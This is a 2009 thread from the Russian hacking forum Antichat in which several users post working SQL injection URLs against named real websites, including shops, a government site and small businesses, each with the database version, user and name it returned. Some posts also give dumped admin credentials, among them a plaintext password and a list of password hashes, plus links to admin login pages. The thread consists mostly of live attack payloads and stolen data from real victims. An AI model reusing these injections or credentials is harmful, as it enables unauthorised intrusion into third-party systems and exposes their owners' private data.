ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7711  
Старый 09.02.2009, 09:02
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.computersworth.com/item.cfm?id=32%20or%201=@@version--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)


Цитата:
http://www.computersworth.com/item.cfm?id=32%20or%201=(select%20system_user)--
ccs2a

Цитата:
http://www.computersworth.com/item.cfm?id=32%20or%201=(select%20db_name())--
scCommerce_computersworth



Цитата:
http://www.14kofginafpd.com/items.php?id=1970987098708/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a,version(),user(),databa se()),8,9--
Database Version: 5.1.30
Database name: gamepile_14kofginafpd
User name: gamepile_webuser@localhost


Питорасики -)))

Цитата:
http://phillygaycalendar.com/pages/video.php?id=57987969876543+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10--

Version:4.0.27-max-log
User:mccann76@68.178.211.7
Database:mccann76



Цитата:
http://mayberryfineart.com/page.php?op=artist&id=5809780896798653+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,concat_ws(0x3a,version(),user(),database()), 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40--
Database Version:4.0.27-standard
User name:maybs_mfadb@localhost
Database name:maybs_claire


ASP С мускулом!

Цитата:
http://www.elcaandy.org/archivearticle.asp?id=-53+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9--

Database Version:4.0.24-nt-max
User name:internetadmin@DEDI408
Database name:standrew

Последний раз редактировалось spherics; 09.02.2009 в 10:21..
 
Ответить с цитированием

  #7712  
Старый 09.02.2009, 11:25
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PageRank 6

Цитата:
http://rothburyfestival.com/festival/artists.php?id=57890709780973+union+select+concat_ ws(0x3a,version(),user(),database())--
Database Version: 5.1.11-beta
Database name: rothbury
User name: web.rbf@localhost


Вывод на картиночке =)


Цитата:
http://www.citric.cat/noticia.php?id=6809709768+union+select+concat_ws(0 x3a,version(),user(),database()),2--&grup=do-ce
Version:4.1.25-Debian_mt1
User:citric@72.47.224.15
Database:citric_es
 
Ответить с цитированием

PR4
  #7713  
Старый 09.02.2009, 11:29
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию PR4

http://www.spiderproject.ro/ro/noutati.php?art=-39+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10

Database Version: 5.0.67-community-log
Database name: spiderpr_1
User name: spiderpr_1@localhost



З.Ы. особо дорог сей сайт тем , что его главный директор а именно http://www.spiderproject.ro/ro/echipa.php преподовал мне енту тему 1 год, екзамен сдал на ура, так как был единственным рускоязычным студентом в группе...а данная програма русская разработка

Последний раз редактировалось Gorev; 09.02.2009 в 11:52..
 
Ответить с цитированием

  #7714  
Старый 09.02.2009, 12:57
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.srosolutions.net/srosolution.php?id=5708609650843+union+select+1,2, 3,concat_ws(0x3a,version(),user(),database()),5,6--
Database Version: 5.0.67-msl-icd1-log
Database name: srosolutions_cms
User name: srosolutions@s401.sureserver.com




Цитата:
http://www.srosolutions.net/srosolution.php?id=5708609650843+UNION+SELECT+1,2, 3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONC AT(username,0x3a,password)+FROM+srosolutions_cms.s ysadmin+LIMIT+1,1),0x3a),0x71),0x71),5,6--
Fields usernameassword

: admin : cantona1996
 
Ответить с цитированием

  #7715  
Старый 09.02.2009, 13:00
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://kormos.ro/index.php?lg=en&produse&pid=2[SQL]



Version: 5.0.67-community
DataBase: kormos_kormos
User: kormos_kormos@localhost


www.kormos.ro/admin
 
Ответить с цитированием

  #7716  
Старый 09.02.2009, 13:27
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.freedomszone.com/aggregator.php?id=809809757093+union+select+1,conc at_ws(0x3a,version(),user(),database()),3--
Version:4.0.27-standard
User:freedoms_freedom@localhost
Database:freedoms_freefeed


Цитата:
http://www.spoonloads.com/section.php?what=News&id=18098097064+union+select+ 1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7--
Version:4.1.22-standard-log
User:spoono_db@localhost
Database:spoono_sections

Последний раз редактировалось spherics; 09.02.2009 в 13:35..
 
Ответить с цитированием

  #7717  
Старый 09.02.2009, 13:52
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.structural-project.ro/page.php?pid=-18+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS( 0x3a,Version(),Database(),User()),0x71),0x71),2,3, 4,5,6/*


Database Version: 4.1.11-log
Database name: structural
User name: project@ns3.opticnet.ro


id,password,usr
1:Razvan Ioan:3e21ab
62fb17400301d9f0156b6c3031:razvanioan
1:Niculina Tutu:3bcdff0b24ffe7eaeb6ed4966852c31f:nicktutu
1:Admin:39b508932796a4c883b56bfc20e96054:StructPro ject

www.structural-project.ro/admin
 
Ответить с цитированием

  #7718  
Старый 09.02.2009, 14:16
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.digitalvision.ro/index.php?modp=sas&sid=-251301462+UNION+SELECT+1,2,3,concat_ws(0x3a,versio n(),database(),user()),5,6/*&prord=ASC



Database Version: 5.0.48
Database name: digitalvision_ro
User name: dv_ro_miniuser@localhost



http://www.digitalvision.ro/admin.php

6898262ba962c9fe79fb3d5a057c8d75
 
Ответить с цитированием

  #7719  
Старый 09.02.2009, 15:52
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.pdn.dkp.go.id/index.php?mod=modules/prd02.php&no=-31%20union%20select%201,2,3,4,concat_ws(0x3a,user, password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29%20from%20login--

И вот содержимое таблицы Login

NIP,user,unit,level,org,time_login,time_logout,sta tus,psw,login_id,sessionid,userid,von,bis,status,s ite,UserID,UserPass,NamaUser,Level,Unker,no,user,p assword,level,no,user,password,level,no,user,passw ord,level
 
Ответить с цитированием

  #7720  
Старый 09.02.2009, 18:51
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://matrimoniale.oltenia.ro/trimite-14354[SQL].html


Version : 5.0.22-log
Database: matrimoniale
User : dassaev@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ